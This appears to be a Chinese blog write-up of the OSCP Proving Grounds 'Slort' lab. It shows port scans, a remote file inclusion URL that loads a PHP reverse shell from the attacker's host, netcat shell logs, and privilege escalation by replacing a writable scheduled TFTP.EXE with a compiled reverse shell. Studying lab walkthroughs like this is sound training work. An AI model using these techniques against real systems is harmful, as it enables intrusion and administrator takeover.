当前位置：首页 > news >正文

OSCP - Proving Grounds - Slort

news 2025/7/4 22:15:59

主要知识点

文件包含
windows的reveseshell

具体步骤

执行nmap,依旧是很多端口开放，尝试了ftp,smb等均失败

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-13 12:00 UTC
Nmap scan report for 192.168.53.53
Host is up (0.00095s latency).
Not shown: 65520 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd 0.9.41 beta
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3306/tcp  open  mysql?
| fingerprint-strings: 
|   HTTPOptions, LDAPBindReq, NULL, SSLSessionReq: 
|_    Host '192.168.49.53' is not allowed to connect to this MariaDB server
4443/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.53.53:4443/dashboard/
5040/tcp  open  unknown
7680/tcp  open  pando-pub?
8080/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-open-proxy: Proxy might be redirecting requests
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.53.53:8080/dashboard/
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC

但是4443和8080端口都有web应用开放，尝试dirb一下，结果很类似，都有site路径开放

# Dirsearch started Sun Oct 13 08:24:31 2024 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u http://192.168.170.53:4443 -w /usr/share/wordlists/dirb/big.txt......
......
301   346B   http://192.168.170.53:4443/site    -> REDIRECTS TO: http://192.168.170.53:4443/site/
......
......

url中包含page=xxx等字样，也许有文件包含漏洞

尝试一下，确实可以包含本地文件，接下来尝试远程文件包含去执行reverse shell

准备一下php web shell ,kali自带的php reverse sehll不好用，用下面的替代https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php?ref=benheater.com

启动了nc -nlvp 80，和python -m http.server命令后，访问如下link,reverse shell创建成功,这时可以

http://192.168.170.53:4443/site/index.php?page=http://192.168.45.239:8000/rev_1.php

C:\home\kali\Documents\OFFSEC\WarmUp\Slort> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.239] from (UNKNOWN) [192.168.170.53] 50464
SOCKET: Shell has connected! PID: 7476
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.C:\xampp\htdocs\site>
C:\xampp\htdocs\site>id
'id' is not recognized as an internal or external command,
operable program or batch file.C:\xampp\htdocs\site>whoami
slort\rupert
C:\xampp\htdocs\site>type C:\Users\rupert\Desktop\local.txt
e8010a2882e22b837b7d0d0d746b2f74

把winPEASx64.exe通过同样的方式上传到服务器端并执行，得知我们可以更改C:\Backup\TFTP.exe

����������͹ Searching executable files in non-default folders with write (equivalent) permissions (can be slow)File Permissions "C:\Backup\TFTP.EXE": Users [AllAccess],Authenticated Users [WriteData/CreateFiles]

查看C:Backup路径发现每5分钟执行一次

C:\Backup>dir  Volume in drive C has no label.Volume Serial Number is 6E11-8C59Directory of C:\Backup10/13/2024  06:25 AM    <DIR>          .
10/13/2024  06:25 AM    <DIR>          ..
06/12/2020  07:45 AM            11,304 backup.txt
06/12/2020  07:45 AM                73 info.txt
06/23/2020  07:49 PM            73,802 TFTP.EXE4 File(s)        187,334 bytes2 Dir(s)  28,561,285,120 bytes freeC:\Backup>type info.txt
Run every 5 minutes:
C:\Backup\TFTP.EXE -i 192.168.234.57 get backup.txt

搜索一下windows reverse shell相关信息找到了

https://github.com/izenynn/c-reverse-shell，按照说明编译出reverse.exe并以同样方式上传到remote server后，覆盖C:\Backup\TFTP.EXE

C:\Backup>dir  Volume in drive C has no label.Volume Serial Number is 6E11-8C59Directory of C:\Backup10/13/2024  06:25 AM    <DIR>          .
10/13/2024  06:25 AM    <DIR>          ..
06/12/2020  07:45 AM            11,304 backup.txt
06/12/2020  07:45 AM                73 info.txt
06/23/2020  07:49 PM            73,802 TFTP.BACKUP.EXE
10/13/2024  06:24 AM           102,155 TFTP.EXE4 File(s)        187,334 bytes2 Dir(s)  28,561,285,120 bytes free

在本地启动nc -nlvp 443后，等一段时间就可以拿到administrator权限的shell

C:\home\kali\Documents\OFFSEC\WarmUp\Slort> nc -nlvp 443 
listening on [any] 443 ...
connect to [192.168.45.239] from (UNKNOWN) [192.168.170.53] 50617
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.C:\WINDOWS\system32>C:\WINDOWS\system32>id
id
'id' is not recognized as an internal or external command,
operable program or batch file.C:\WINDOWS\system32>whoami
whoami
slort\administratorC:\WINDOWS\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\DesktopC:\Users\Administrator\Desktop>dir
dirVolume in drive C has no label.Volume Serial Number is 6E11-8C59Directory of C:\Users\Administrator\Desktop05/04/2022  01:30 AM    <DIR>          .
05/04/2022  01:30 AM    <DIR>          ..
05/04/2022  01:21 AM    <DIR>          PG
10/13/2024  05:08 AM                34 proof.txt1 File(s)             34 bytes3 Dir(s)  28,561,133,568 bytes freeC:\Users\Administrator\Desktop>type proof.txt
type proof.txt
f94a028a4e3c54e15f32f1dae49907b6C:\Users\Administrator\Desktop>cd

查看全文

http://www.lryc.cn/news/510420.html